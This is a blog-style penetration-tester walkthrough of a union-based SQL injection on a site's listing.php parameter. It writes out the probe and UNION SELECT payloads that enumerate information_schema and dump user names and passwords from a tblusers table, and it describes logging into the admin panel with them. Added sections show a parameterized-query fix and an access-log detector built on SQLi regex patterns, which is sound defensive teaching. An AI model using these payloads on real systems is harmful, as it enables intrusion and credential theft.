How I Exploited a Union-Based SQL Injection Flaw to Get the Database of a Website and Access the Admin Panel

Paras Arora
3 min read · Sep 5, 2019


SQL Injection: SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements against the database server behind a web application. Attackers can use SQL injection vulnerabilities to bypass application security measures: they can get around the authentication and authorization of a web page or web application and retrieve the contents of the entire SQL database.

Let’s start !!

While browsing the website I noticed a GET parameter in the URL, i.e. website.com/listing.php?id=1

Checking for an SQL syntax error by placing an apostrophe at the end of the parameter value.

After placing the apostrophe and browsing to the URL, the browser converts it to its URL-encoded form:

' is changed to %27

The page responds with an SQL syntax error, which means the website is vulnerable to an SQL injection attack.

Now, passing SQL queries (union-based injection)

website url/listing.php?id=1 order by 3 --+

order by 4, 5, etc. do not display any result, so the original query selects 3 columns and we proceed with 3.

Next we need to know which column we can use to get our query's output onto the page.

A UNION SELECT of plain numbers reflects the "vulnerable" column number somewhere on the web page, which means we can place our query where that number is.

In this case, column 3 is the vulnerable one.
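The three probes above (the apostrophe that produces a syntax error, ORDER BY to count columns, UNION SELECT to find the reflected column) all work for the same reason: listing.php pastes the id parameter straight into the SQL text. The following is an added example, not code from the original post or from the affected site, that reproduces that broken pattern and the fix side by side. It assumes an in-memory SQLite database standing in for the site's MySQL server (so MySQL-only functions such as database() and information_schema are not reproduced), with a constructed listings table and a tblusers table named after the one in the write-up; all rows are made-up sample data.

```python
import sqlite3
from typing import List, Tuple

# Constructed stand-in for the site's database (assumption: SQLite instead of MySQL).
# "listings" is what listing.php reads; "tblusers" is the table the write-up reaches
# through UNION. The password value is a placeholder, not a real hash.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE listings (id INTEGER, title TEXT, description TEXT);
        INSERT INTO listings VALUES (1, 'First listing', 'Public text');
        INSERT INTO listings VALUES (2, 'Second listing', 'More public text');
        CREATE TABLE tblusers (UserId INTEGER, UserName TEXT, UserPwd TEXT);
        INSERT INTO tblusers VALUES (1, 'admin', 'placeholder-hash');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """The broken pattern: the raw GET parameter becomes part of the SQL text.

    Whatever follows the number (ORDER BY, UNION SELECT, a comment marker) is
    executed as SQL, which is exactly what the write-up's probes rely on.
    """
    sql = "SELECT id, title, description FROM listings WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """The hardened form: a bound placeholder keeps the parameter as data.

    The same payloads no longer change the query; they are compared against the
    integer id column as an opaque value and simply match no row. (Rejecting
    non-numeric ids before the query is a cheap extra check.)
    """
    sql = "SELECT id, title, description FROM listings WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


def query_errors(conn: sqlite3.Connection, id_param: str) -> bool:
    """True if the vulnerable lookup raises a database error for this input.

    This is the signal the write-up reads from the page: an error for a trailing
    apostrophe, or for ORDER BY n when n exceeds the column count.
    """
    try:
        lookup_vulnerable(conn, id_param)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("plain id, vulnerable:", lookup_vulnerable(db, "1"))
    print("apostrophe errors:", query_errors(db, "1'"))
    print("order by 3 errors:", query_errors(db, "1 order by 3 --"))
    print("order by 4 errors:", query_errors(db, "1 order by 4 --"))
    print("union, vulnerable:", lookup_vulnerable(db, "1 union select 1,2,UserName from tblusers --"))
    print("union, safe:", lookup_safe(db, "1 union select 1,2,UserName from tblusers --"))
```

The vulnerable function errors on `1'`, accepts `ORDER BY 3` but errors on `ORDER BY 4`, and returns a row whose third column is a user name; the parameterized function returns the listing for `1` and an empty result for every injected value. Note that SQLite's `--` comment does not need the trailing space that MySQL does, which is why the write-up's `--+` (a `+` that the server decodes to a space) is written as a bare `--` here.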

Want to know the name of the website's DATABASE?

execute: website url/listing.php?id=1 union select 1,2,database() --+

Name Of DATABASE: outbacklabs2

Extracting the tables present in the DATABASE

Query: website url/listing.php?id=1 union select 1,2,table_name from information_schema.tables --+

Found a useful table name: tblusers

which can contain the user names of registered users.

Extracting column names from table "tblusers"

Query: website url/listing.php?id=1 union select 1,2,column_name from information_schema.columns where table_name="tblusers" --+

Useful columns found: UserId, UserName, UserPwd

Finally, extracting UserId, UserName and UserPwd

Query: website url/listing.php?id=1 union select 1,2,group_concat(UserId,0x0a,UserName,0x0a,UserPwd) from tblusers --+

0x0a (the hex value of a line feed) is used as a separator between the values.

Finally, the recovered username and password are entered into the admin panel of the website.
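Each step of this walkthrough is a GET request that lands in the web server's access log, and the sequence (a lone %27, ORDER BY with increasing numbers, UNION SELECT, information_schema, a trailing comment marker) is distinctive enough to alert on. The following is an added example, not part of the original post, of a detector that scans access-log lines for those indicators and escalates a client once it has triggered several distinct ones. It assumes Apache-style combined log lines; the sample lines, IP addresses and timestamps are constructed for the example.

```python
import re
from typing import Dict, List, NamedTuple, Set, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (assumption: Apache combined-style format).
# They mirror the write-up's request sequence; addresses and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Sep/2019:10:00:01 +0000] "GET /listing.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Sep/2019:10:00:09 +0000] "GET /listing.php?id=1%27 HTTP/1.1" 500 312
203.0.113.5 - - [05/Sep/2019:10:00:31 +0000] "GET /listing.php?id=1+order+by+4+--+ HTTP/1.1" 500 312
203.0.113.5 - - [05/Sep/2019:10:01:02 +0000] "GET /listing.php?id=1+union+select+1,2,database()+--+ HTTP/1.1" 200 5180
203.0.113.5 - - [05/Sep/2019:10:01:40 +0000] "GET /listing.php?id=1+union+select+1,2,table_name+from+information_schema.tables+--+ HTTP/1.1" 200 9000
198.51.100.7 - - [05/Sep/2019:10:02:00 +0000] "GET /listing.php?id=2 HTTP/1.1" 200 5100
"""

# Client IP, timestamp, request line and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Indicators are matched against each *decoded* query-string value, so %27 and
# '+' encoding do not hide them. Each one corresponds to a step in the write-up.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("quote-in-numeric-param", re.compile(r"^\d+'")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\b", re.I)),
    ("comment-terminator", re.compile(r"--\s*$")),
]


class Finding(NamedTuple):
    ip: str
    ts: str
    status: str
    hits: List[Tuple[str, str]]  # (parameter name, indicator label)


def scan_line(line: str):
    """Parse one log line and list the indicators its query parameters trigger."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, giving the SQL the server saw.
    params = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    hits: List[Tuple[str, str]] = []
    for name, values in params.items():
        for value in values:
            hits.extend((name, label) for label, rx in INDICATORS if rx.search(value))
    return Finding(m.group("ip"), m.group("ts"), m.group("status"), hits)


def scan_log(text: str) -> List[Finding]:
    """Scan every non-empty line; unparseable lines are skipped."""
    findings = (scan_line(line) for line in text.splitlines() if line.strip())
    return [f for f in findings if f is not None]


def escalate(findings: List[Finding], min_distinct: int = 3) -> List[str]:
    """Clients that triggered at least min_distinct different indicators.

    A single ORDER BY or stray quote can be noise; a client walking through
    quote -> ORDER BY -> UNION -> information_schema is the pattern to act on.
    """
    seen: Dict[str, Set[str]] = {}
    for f in findings:
        for _, label in f.hits:
            seen.setdefault(f.ip, set()).add(label)
    return sorted(ip for ip, labels in seen.items() if len(labels) >= min_distinct)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        if f.hits:
            print(f.ip, f.ts, f.status, [label for _, label in f.hits])
    print("escalate:", escalate(results))
```

On the sample log the first and last lines are clean, the four probing requests are each tagged with the indicators they contain, and only 203.0.113.5 is escalated. The 500 status on the apostrophe and ORDER BY 4 lines is itself a useful secondary signal: a numeric id that produces a server error is worth a look even without the pattern matches.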

Written by Paras Arora (@parasarora06), Penetration Tester | Application Security
